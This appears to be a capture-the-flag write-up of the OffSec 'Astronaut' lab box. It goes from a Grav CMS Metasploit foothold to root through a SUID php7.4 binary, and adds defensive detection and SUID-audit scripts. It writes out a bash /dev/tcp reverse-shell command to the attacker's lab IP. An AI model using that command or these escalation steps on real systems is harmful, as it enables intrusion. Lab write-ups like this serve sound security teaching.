
# Astronaut

<figure><img src="/files/Z6hQzv5VwEDCC7qzmUg5" alt="" width="563"><figcaption></figcaption></figure>

### TL;DR

I popped open the **Astronaut** box on OffSec Proving Grounds.\
Flow: `nmap` → find HTTP → identify CMS → `searchsploit` → Metasploit exploit → get a session → upgrade to a reverse shell → local enumeration → run `linpeas` → find SUID `php7.4` → use GTFOBins technique → root.

***

## Enumeration

Start with the default reconnaissance:

```bash
nmap -sC -sV -Pn 192.168.122.12 -o nmap.txt
```

<figure><img src="/files/IAD9yOMFfETrprQPOw4I" alt=""><figcaption></figcaption></figure>

Nmap reported a single open port, **80**. The webroot served only one directory, which looked like a CMS, and there was no obvious version badge.

<figure><img src="/files/IFdJzFBHptzQQ7Gqf2Vc" alt=""><figcaption></figcaption></figure>

So, we go hunting for known exploits:

```bash
searchsploit grav
```

Searchsploit returned a promising Grav CMS exploit.

<figure><img src="/files/BjV51G5nAmkdBcBGOEUS" alt=""><figcaption></figcaption></figure>

> Pro tip: When a CMS shows up but no version is obvious, search for common CMS names + “exploit” or use fingerprinting plugins — sometimes the theme or endpoints leak the version.

***

## Get the Foothold

Now, let's try the Metasploit module against this CMS:

<figure><img src="/files/G856DXJ4jrVK6XFKMMAo" alt=""><figcaption></figcaption></figure>

It worked, and we got our session:

<figure><img src="/files/SdNlSnS7pxdxeIMZYXh5" alt=""><figcaption></figcaption></figure>

From the initial session, I wanted a stable reverse shell back to my Kali box.

On Kali, spin up a listener:

```bash
nc -nlvp 9999
```

From the compromised host (via the Metasploit session), drop a reverse bash shell:

```bash
bash -c 'exec bash -i &>/dev/tcp/192.168.45.164/9999 <&1'
```

<figure><img src="/files/jkwuaYvOCTcEgFyJcRC8" alt=""><figcaption></figcaption></figure>

Now we have an interactive shell. Time for local privilege escalation.
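Seen from the defender's side, the `/dev/tcp` redirection used above is a recognisable artifact in process listings. The following is an added example, not part of the original write-up: a small `ps`-output hunter that flags any process whose command line opens `/dev/tcp/<host>/<port>` and extracts the destination for an incident ticket. The sample `ps` lines, including the pid and user values, are constructed for illustration.

```shell
# Added example (not from the original write-up): hunt process listings for the
# bash /dev/tcp reverse-shell idiom. Reads `ps -eo pid,user,args` style output on
# stdin and prints "pid user remote_host remote_port" for every match.
find_devtcp_shells() {
    awk '
        # skip the ps header line
        NR == 1 && $1 == "PID" { next }
        # any command line that opens /dev/tcp/<host>/<port> deserves a ticket
        match($0, /\/dev\/tcp\/[0-9A-Za-z.:-]+\/[0-9]+/) {
            dest = substr($0, RSTART + 9, RLENGTH - 9)   # drop the "/dev/tcp/" prefix
            split(dest, parts, "/")                       # parts[1]=host, parts[2]=port
            print $1, $2, parts[1], parts[2]
        }
    '
}

# Constructed sample of what `ps -eo pid,user,args` shows while the shell from this
# write-up is running; the pid and user values are assumptions for illustration.
PS_SAMPLE='  PID USER     COMMAND
  812 www-data bash -c exec bash -i &>/dev/tcp/192.168.45.164/9999 <&1
  901 www-data /usr/sbin/apache2 -k start
 1023 root     /usr/sbin/sshd -D'

# On a live host:  ps -eo pid,user,args | find_devtcp_shells
printf '%s\n' "$PS_SAMPLE" | find_devtcp_shells
```

This is a point-in-time check, so pair it with a look at established outbound connections (for example `ss -tnp`) owned by the web-server account; an interactive `bash` running as `www-data` is itself the anomaly, whatever the command line says.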

***

## Local Privilege Escalation (LPE)

### Manual enumeration

First, locate the current application directory:

<figure><img src="/files/YIrwDaDyiAbYNa8r72TX" alt=""><figcaption></figcaption></figure>

I checked obvious places for creds and config leaks (e.g., `web.config`, site-specific YAML):

<figure><img src="/files/JVm9o2f6CqdqLaPEJsc5" alt=""><figcaption></figcaption></figure>

Nothing juicy in the `web.config`, but we found `admin.yaml` in the web directory.

<figure><img src="/files/ddhbQPBChTwgtJfcPsF3" alt=""><figcaption></figcaption></figure>

Inside was a bcrypt hash **`$2y$10$dlTNg17RfN4pkRctRm1m2u8cfTHHz7Im.m61AYB9UtLGL2PhlJwe.`**

Nice — hashed credential — but not directly usable for `root`.

***

## Automated enumeration — linpeas to the rescue

I uploaded and ran `linpeas` to speed up LPE discovery.

<figure><img src="/files/mTraWYEvJ6nKgAOcYdIE" alt=""><figcaption></figcaption></figure>

`linpeas` flagged multiple interesting items:

* Potential kernel CVEs (worth investigating for risky boxes)
* Several SUID binaries — very interesting

***

## Quick refresher: what is a SUID binary and why does it matter?

When you see something like:

```
-rwsr-xr-x 1 root root 12345 Jan 1 12:00 /usr/bin/passwd
```

That `s` indicates the **SUID** bit. Executed by ordinary users, that binary runs **with the file owner's privileges** (often root). This makes SUID binaries valuable for privilege escalation — *if* they are misconfigured or exploitable.

**How to find SUID files:**

```bash
find / -perm -4000 2>/dev/null
```

**Common SUID escalation techniques:**

* PATH hijacking (binary calls other programs without full paths)
* LD_PRELOAD abuse (if environment isn't sanitized)
* Leveraging legitimate utilities (e.g., `find`, `vim`, `nmap`) that support shell escapes
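The `find` command above lists SUID files, but on its own it does not say which ones are *unexpected*. The following is an added example, not part of the original write-up: an audit that compares the SUID inventory against an allowlist of binaries a stock install is expected to carry, so a stray SUID interpreter like the `php7.4` found on this box stands out. The allowlist, the `collect_suid` helper and the sample inventory are assumptions for illustration; `-printf` is a GNU `find` feature.

```shell
# Added example (not from the original write-up): audit SUID binaries against an
# allowlist so anything unusual, such as a SUID php7.4, is flagged for review.
# The allowlist is an assumption for illustration; build the real one from a
# known-good image of the same distribution release.
SUID_ALLOWLIST="/usr/bin/passwd /usr/bin/sudo /usr/bin/su /usr/bin/mount /usr/bin/umount /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/newgrp /usr/lib/openssh/ssh-keysign"

# collect_suid: the live-host collector; prints "mode owner path" per SUID file.
# (-printf is GNU find; the write-up's plain `find / -perm -4000` also works,
# it just lacks the mode and owner columns.)
collect_suid() {
    find / -xdev -type f -perm -4000 -printf '%m %u %p\n' 2>/dev/null
}

# audit_suid: reads "mode owner path" records on stdin, prints every SUID file
# that is not on the allowlist, and returns 1 if anything was flagged (0 if clean).
# Root-owned hits matter most: abusing one yields full root, as this box shows.
audit_suid() {
    flagged=0
    while read -r mode owner path; do
        [ -n "$path" ] || continue
        case " $SUID_ALLOWLIST " in
            *" $path "*) continue ;;    # expected SUID binary, nothing to report
        esac
        echo "UNEXPECTED SUID: $mode $owner $path"
        flagged=1
    done
    return $flagged
}

# Constructed sample of collect_suid output from a host where php7.4 was made SUID,
# the situation in this write-up.
SAMPLE_SUID='4755 root /usr/bin/passwd
4755 root /usr/bin/sudo
4755 root /usr/bin/php7.4
4755 root /usr/lib/openssh/ssh-keysign'

# On a live host:  collect_suid | audit_suid
printf '%s\n' "$SAMPLE_SUID" | audit_suid || echo "-> verify each hit, then strip the bit: chmod u-s <path>"
```

Run the collector once on a freshly built host to seed the allowlist, then schedule the audit and alert on a non-zero exit; a SUID bit on an interpreter or on anything under a web application's directory should never be on the allowlist.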

***

## PHP 7.4 binary with SUID

`linpeas` showed a suspicious `php7.4` binary with the SUID bit. That's a red flag: a SUID interpreter lets anyone who can run it execute arbitrary code as the file's owner.

<figure><img src="/files/psKCRaHVpbUgHrs1wMX8" alt=""><figcaption></figcaption></figure>

I checked [GTFOBins](https://gtfobins.github.io/gtfobins/php/#suid) (the canonical source of abuse patterns for common binaries) and found an entry for `php` under SUID usage.

<figure><img src="/files/xdZ34g1OIOtUG7Pr1tzW" alt=""><figcaption></figcaption></figure>

Let's try it on our box:

<figure><img src="/files/dKsIqQAyY4BZdZbVzjlt" alt=""><figcaption></figcaption></figure>

And just like that — root. 🎯

> Hope you enjoyed it 😊
